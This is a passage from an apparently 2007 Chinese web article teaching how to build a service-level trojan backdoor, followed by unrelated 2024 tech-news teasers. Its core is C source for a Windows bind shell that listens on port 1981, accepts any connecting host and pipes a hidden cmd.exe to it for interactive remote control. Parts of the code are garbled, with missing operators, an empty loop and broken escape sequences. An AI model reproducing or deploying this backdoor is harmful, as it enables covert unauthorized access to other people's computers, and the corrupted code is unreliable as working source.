黑客技巧：如何做服务级的木马后门

互联网 | 编辑: 杨剑锋 2007-07-30 16:14:00转载一键看全文

后门函数

服务控制函数搞定了，下面就剩下主体的后门函数了。本程序借用了许多前辈翻写过了无数次的后门程序，通过开一个端口监听，允许任何与该端口连接的远程主机建立信任连接，并提供一个交互式Shell。为了代码清晰，我去掉了错误检查，整个过程很简单，也就不多解释了，代码如下：

DWORD WINAPI MainFn(LPVOID lpParam)
{
WSADATA WSAData;
struct sockaddr_in RemoteAddr;
DWORD dwThreadIdA,dwThreadIdB,dwThreadParam=0;
PROCESS_INFORMATION processinfo;
STARTUPINFO startinfo;

WSAStartup(MAKEWORD(2,2),&WSAData);
ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
RemoteAddr.sin_family = AF_INET;
RemoteAddr.sin_port = htons(1981); //监听端口
RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;

bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
listen(ServerSocket, 2);

varA = 0;
varB = 0;
CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);

dowhile((varA 　　 varB) == 0);

GetStartupInfo(&startinfo);
startinfo.dwFlags = STARTF_USESHOWWINDOW　STARTF_USESTDHANDLES;
startinfo.hStdInput = hReadPipe;
startinfo.hStdError = hWritePipe;
startinfo.hStdOutput = hWritePipe;
startinfo.wShowWindow = SW_HIDE; //隐藏控制台窗口

char szAPP[256];
GetSystemDirectory(szAPP,MAX_PATH+1);

strcat(szAPP,"cmd.exe");
//开cmd进程
if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, 
  NULL, NULL, &startinfo, &processinfo) == 0)
{
  printf ("CreateProcess Error!n");
  return -1;
}

while (true) 
{
ClientSocket = accept(ServerSocket, NULL, NULL);
Sleep(250);
}

return 0;
}

//线程函数A, 通过管道A来从控制端接受输入，然后写入被控制端输入端
DWORD WINAPI ThreadFuncA( LPVOID lpParam )
{
SECURITY_ATTRIBUTES pipeattr;
DWORD nByteToWrite, nByteWritten;
char recv_buff[1024];

pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeattr.lpSecurityDescriptor = NULL;
pipeattr.bInheritHandle = TRUE;
CreatePipe(&hReadPipe,
&hWriteFile,
&pipeattr,
0);

varA = 1;
while(true)
{
Sleep(250);
nByteToWrite = recv(ClientSocket,
  recv_buff,
  1024,
  0);
printf("%sn", recv_buff);
WriteFile(hWriteFile,
  recv_buff,
  nByteToWrite,
  &nByteWritten,
  NULL);
}
return 0;
}

//线程函数B, 通过管道B来从被控制端接受输入，然后写到控制端输出端
DWORD WINAPI ThreadFuncB( LPVOID lpParam )
{
SECURITY_ATTRIBUTES pipeattr;
DWORD len;
char send_buff[25000];

pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeattr.lpSecurityDescriptor = NULL;
pipeattr.bInheritHandle = TRUE;

CreatePipe(&hReadFile,
&hWritePipe,
&pipeattr,
0);

varB = 1;
while (true)

return 0;
}

提示：试试键盘 “← →” 可以实现快速翻页

总共 4 页< 上一页 1 2 3 4 下一页 >

一键看全文

本文导航

每日精选

ROG游戏手机9系列新品发布会直播

ROG游戏手机9系列11月19日19:00新品发布，反正超AI玩！等你来看！

标签：游戏手机| ROG9| 发布会| 直播| 2024-11-19
前三季度中国电子纸平板线上爆发式增长销量111.8万台

中国市场前三季度电子纸平板的出货量为148.2万台，同比增长128.4%。大部分的销量仍集中于线上，特别是内容电商的爆发式增长拉高了线上渠道的占比。

标签：电子纸| 2024-11-15
引领豪华MPV新趋势比亚迪夏内饰科技广州车展首发

比亚迪第五代DM技术中大型旗舰MPV夏内饰科技在广州车展正式发布，从技术、平台、安全、设计、空间、智享、智驾七大维度，全面引领豪华MPV新趋势，将于2025年一季度上市。

标签：比亚迪| 夏| MPV| 广州车展| 2024-11-15
余承东说漏嘴了华为Mate 70系列26号发布

在11月15日广州车展中，华为余承东在直播活动中意外透露了华为Mate 70系列的发布时间，新机将在11月26日正式推出。

标签：华为| 华为Mate70| 余承东| 发布| 2024-11-15
红魔10 Pro上手体验：风扇加持，堪称游戏党梦中情机

红魔10 Pro以独特的设计、出色的性能与稳定的影像表现，成为当前电竞旗舰手机中的佼佼者。它不仅是行业中少有的背部纯平设计，搭配6.85寸全面屏，带来极具视觉冲击的体验，整体外观显得更加规整、精致。

标签：红魔| 10| Pro| 带来| 极致| 2024-11-19
OPPO Pad 3即将登场 2.8K原彩仿书柔光屏，学生党必备

OPPO发布了OPPO Pad 3平板新品的外观图，拥有星轨亮银、霞光紫、夜幕蓝、三个配色。

标签： OPPO| OPPOPad3| 平板| 2024-11-15
Q3中国智能盒子线上零售量同比-5.5% 小米市场份额13.1%

2024年第三季度，中国智能盒子线上市场的零售量为31.2万台，同比下降5.5%，环比增长22.0%。

标签：小米| 智能盒子| 2024-11-15
立足中国走向全球 openEuler开源五年装机千万

以“以智能，致世界”为主题的操作系统大会2024在北京中关村国际创新中心召开，本次大会由openEuler社区、全球计算联盟共同主办，旨在汇聚全球产业界力量，推动基础软件根技术持续创新。

标签： openEuleopenEuler社区| 开源| 2024-11-15
极氪亮相广州车展首发浩瀚智驾2.0端到端Plus架构

2024广州国际车展，极氪浩瀚智驾2.0首发面向高阶智驾的端到端Plus架构，让“智驾更类人、人驾更省心”。同时，极氪携旗下全系车型亮相广州车展，打造多场景出行极致体验。

标签：极氪| 广州车展| 浩瀚| 智驾| 2024-11-15
阿维塔11双动力广州车展开启预售 29.99万元起

阿维塔11增程搭载领先一代昆仑增程、宁德时代骁遥超级增混电池等领先技术，为用户带来极致强劲、极致静谧、极致省心的出行体验。

标签：阿维塔| 阿维塔11| 增程| 广州车展| 2024-11-15